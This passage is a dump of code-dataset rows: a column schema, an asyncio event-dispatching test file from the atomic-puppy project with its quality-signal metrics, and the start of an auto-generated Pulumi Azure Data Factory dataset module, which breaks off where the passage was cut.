Dataset schema (one row per source file; column name and type):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |

Each `qsc_*_quality_signal` column stores the measured statistic for the file; the matching unsuffixed `qsc_*` column holds a 0/1 value for the same signal (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`), and `effective` and `hits` close out each row.
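A minimal way to load and inspect rows with this schema, assuming the records sit in a local Parquet file and that pandas with a Parquet engine is available (the file name below is hypothetical, not something stated in this dump):

```python
# Minimal inspection sketch. Assumptions (not stated in this dump): the rows
# are stored in a local Parquet file called "code_quality_signals.parquet",
# and pandas with a Parquet engine is installed.
import pandas as pd

df = pd.read_parquet("code_quality_signals.parquet")  # hypothetical file name

# Raw statistics end in "_quality_signal"; each has an unsuffixed twin column,
# and "hits" is an integer per row.
signal_cols = [c for c in df.columns if c.endswith("_quality_signal")]
flag_cols = [c[: -len("_quality_signal")] for c in signal_cols]

row = df.iloc[0]
print(row["max_stars_repo_name"], row["max_stars_repo_path"], "hits:", row["hits"])
for sig, flag in zip(signal_cols, flag_cols):
    print(f"{flag:50s} value={row[sig]!r:>12} flag={row[flag]!r}")
```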
Record 1: madedotcom/atomic-puppy, tests/test_dispatching.py

| Field | Value |
|---|---|
| hexsha | f045c2feb9a1e120f06832a2ce35a12d79004f7f |
| size | 11,738 |
| ext | py |
| lang | Python |
| max_stars_repo_path, max_issues_repo_path, max_forks_repo_path | tests/test_dispatching.py |
| max_stars_repo_name, max_issues_repo_name, max_forks_repo_name | madedotcom/atomic-puppy |
| max_stars_repo_head_hexsha, max_issues_repo_head_hexsha, max_forks_repo_head_hexsha | 391b6f9928d8c7558eb30d380ff5a744a9122943 |
| max_stars_repo_licenses, max_issues_repo_licenses, max_forks_repo_licenses | ["MIT"] |
| max_stars_count, max_issues_count, max_forks_count | null |
| stars/issues/forks event min/max datetimes | null |

content:

```python
from types import SimpleNamespace as ns
import asyncio
from atomicpuppy import EventRaiser, RejectedMessageException, ExceptionCause
from atomicpuppy.atomicpuppy import Event
from .fakehttp import SpyLog
from uuid import uuid4
class When_an_event_is_processed:
the_message = None
event_recorder = {}
sequence_no = 43
def given_an_event_raiser(self):
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.message_processor = EventRaiser(self.queue,
self.event_recorder,
lambda e: self.process_message(e))
def because_we_add_a_message(self):
msg = Event(self.message_id, "type", {}, "stream", self.sequence_no)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.message_processor.start())
def it_should_have_sent_the_message(self):
assert(self.the_message.id == self.message_id)
def it_should_have_recorded_the_event(self):
assert(self.event_recorder["stream"] == self.sequence_no)
async def send_message(self, e):
return await self.queue.put(e)
def process_message(self, e):
self.the_message = e
self.message_processor.stop()
class When_an_event_is_processed_by_running_once:
the_message = None
event_recorder = {}
sequence_no = 43
def given_an_event_raiser(self):
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.message_processor = EventRaiser(self.queue,
self.event_recorder,
lambda e: self.process_message(e))
def because_we_add_a_message(self):
msg = Event(self.message_id, "type", {}, "stream", self.sequence_no)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.message_processor.consume_events())
def it_should_have_sent_the_message(self):
assert(self.the_message.id == self.message_id)
def it_should_have_recorded_the_event(self):
assert(self.event_recorder["stream"] == self.sequence_no)
async def send_message(self, e):
return await self.queue.put(e)
def process_message(self, e):
self.the_message = e
class When_a_message_is_rejected:
event_recorder = {}
def given_an_event_raiser(self):
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.event_raiser = EventRaiser(
self.queue,
self.event_recorder,
lambda e: self.process_message(e),
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.event_raiser.start())
def it_should_log_a_warning(self):
m = "message-type message "+str(self.message_id) \
+" was rejected and has not been processed"
assert(any(r.message == m for r in self._log.warnings))
def process_message(self, e):
self.event_raiser.stop()
raise RejectedMessageException()
async def send_message(self, e):
return await self.queue.put(e)
class When_a_message_raises_an_unhandled_exception:
event_recorder = {}
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.exc_handler_context = None
self.exc_handler_loop = None
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
self.event_raiser = EventRaiser(
self.queue,
self.event_recorder,
lambda e: self.process_message(e),
exception_handler=exception_handler
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_log_an_error(self):
if self.example.use_exception_handler:
return
m = "Failed to process message "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause", "atomicpuppy_message"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
NotImplementedError), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.handler), \
self.exc_handler_context
assert isinstance(
self.exc_handler_context["atomicpuppy_message"], Event), \
self.exc_handler_context
def process_message(self, e):
self.event_raiser.stop()
raise NotImplementedError("This handler is not here")
async def send_message(self, e):
return await self.queue.put(e)
class When_the_callback_is_asynchronous:
def given_an_event_raiser(self):
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
events = {}
self.callback_exhausted = [False]
async def async_callback(evt):
self.event_raiser.stop()
self.callback_exhausted[0] = True
self.event_raiser = EventRaiser(
queue=self.queue,
counter=events,
callback=async_callback,
)
async def send_message(self, e):
return await self.queue.put(e)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_have_exhausted_the_callback(self):
assert self.callback_exhausted[0]
class When_an_asynchronous_callback_fails:
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
events = {}
self.callback_exhausted = [False]
class Failure(Exception):
pass
self.failure_type = Failure
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
async def async_callback(evt):
self.event_raiser.stop()
raise Failure()
self.event_raiser = EventRaiser(
queue=self.queue,
counter=events,
callback=async_callback,
exception_handler=exception_handler
)
async def send_message(self, e):
return await self.queue.put(e)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def the_exception_should_be_logged(self):
if self.example.use_exception_handler:
return
m = "Failed to process message "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause", "atomicpuppy_message"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
self.failure_type), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.handler), \
self.exc_handler_context
assert isinstance(
self.exc_handler_context["atomicpuppy_message"], Event), \
self.exc_handler_context
class When_the_counter_raises_an_unhandled_exception:
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.exc_handler_context = None
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
class FailingCounter:
def __setitem__(self, name, value):
raise NotImplementedError()
self.event_raiser = EventRaiser(
self.queue,
FailingCounter(),
lambda e: self.process_message(e),
exception_handler=exception_handler
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_have_attempted_to_process_the_message(self):
assert(self.the_message.id == self.message_id), self.the_message
def it_should_log_an_error(self):
if self.example.use_exception_handler:
return
m = "Failed to persist last read event with "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
NotImplementedError), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.counter), \
self.exc_handler_context
def process_message(self, e):
self.the_message = e
self.event_raiser.stop()
async def send_message(self, e):
return await self.queue.put(e)
```

Per-file statistics and quality signals (for `qsc_*` rows, Value is the `*_quality_signal` column and Flag is the matching unsuffixed column):

| Field | Value | Flag |
|---|---|---|
| avg_line_length | 32.696379 | |
| max_line_length | 79 | |
| alphanum_fraction | 0.628131 | |
| qsc_code_num_words | 1,364 | 0 |
| qsc_code_num_chars | 11,738 | 0 |
| qsc_code_mean_word_length | 5.095308 | 0 |
| qsc_code_frac_words_unique | 0.099707 | null |
| qsc_code_frac_chars_top_2grams | 0.069065 | 0 |
| qsc_code_frac_chars_top_3grams | 0.056403 | 0 |
| qsc_code_frac_chars_top_4grams | 0.081583 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.864029 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.856835 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.842014 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.842014 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.842014 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.82964 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.002248 | 0 |
| qsc_code_frac_chars_whitespace | 0.279945 | 0 |
| qsc_code_size_file_byte | 11,738 | 0 |
| qsc_code_num_lines | 358 | 0 |
| qsc_code_num_chars_line_max | 80 | 0 |
| qsc_code_num_chars_line_mean | 32.78771 | 0 |
| qsc_code_frac_chars_alphabet | 0.820043 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.823105 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.045153 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.075812 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.140794 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.00361 | 0 |
| qsc_codepython_frac_lines_import | 0.021661 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0.01083 | 0 |
| qsc_codepython_score_lines_no_logic | 0.281588 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
| effective | 0 | |
| hits | 7 | |
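Several of the simpler statistics above can be recomputed straight from the `content` string. The sketch below is an approximation under plain whitespace tokenisation; the exact definitions behind the stored values are not documented in this dump:

```python
# Rough re-computation of a few of the simpler signals from a file's `content`
# string. Tokenisation and edge-case handling are assumptions, so results are
# approximations of the stored columns, not their authoritative definitions.
def simple_signals(content: str) -> dict:
    words = content.split()            # plain whitespace tokenisation (assumption)
    lines = content.splitlines()
    n_chars = len(content)
    n_words = max(len(words), 1)
    n_lines = max(len(lines), 1)
    return {
        "num_words": len(words),
        "num_chars": n_chars,
        "mean_word_length": sum(map(len, words)) / n_words,
        "frac_words_unique": len(set(words)) / n_words,
        "frac_chars_whitespace": sum(ch.isspace() for ch in content) / max(n_chars, 1),
        "num_lines": len(lines),
        "num_chars_line_max": max((len(line) for line in lines), default=0),
        "avg_line_length": n_chars / n_lines,
    }

# e.g. simple_signals(row['content']) for the test_dispatching.py row should
# come out near the stored values (1,364 words; 11,738 chars; 358 lines).
```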
Record 2: sebtelko/pulumi-azure-native, sdk/python/pulumi_azure_native/datafactory/dataset.py

| Field | Value |
|---|---|
| hexsha | f05b3a33385a704e6d67c93fd8a623fa540ee0a8 |
| size | 32,570 |
| ext | py |
| lang | Python |
| max_stars_repo_path, max_issues_repo_path, max_forks_repo_path | sdk/python/pulumi_azure_native/datafactory/dataset.py |
| max_stars_repo_name, max_issues_repo_name, max_forks_repo_name | sebtelko/pulumi-azure-native |
| max_stars_repo_head_hexsha, max_issues_repo_head_hexsha, max_forks_repo_head_hexsha | 711ec021b5c73da05611c56c8a35adb0ce3244e4 |
| max_stars_repo_licenses, max_issues_repo_licenses, max_forks_repo_licenses | ["Apache-2.0"] |
| max_stars_count, max_issues_count, max_forks_count | null |
| stars/issues/forks event min/max datetimes | null |

content:

```python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DatasetArgs', 'Dataset']
@pulumi.input_type
class DatasetArgs:
def __init__(__self__, *,
factory_name: pulumi.Input[str],
properties: pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']],
resource_group_name: pulumi.Input[str],
dataset_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Dataset resource.
:param pulumi.Input[str] factory_name: The factory name.
:param pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']] properties: Dataset properties.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] dataset_name: The dataset name.
"""
pulumi.set(__self__, "factory_name", factory_name)
pulumi.set(__self__, "properties", properties)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dataset_name is not None:
pulumi.set(__self__, "dataset_name", dataset_name)
@property
@pulumi.getter(name="factoryName")
def factory_name(self) -> pulumi.Input[str]:
"""
The factory name.
"""
return pulumi.get(self, "factory_name")
@factory_name.setter
def factory_name(self, value: pulumi.Input[str]):
pulumi.set(self, "factory_name", value)
@property
@pulumi.getter
def properties(self) -> pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 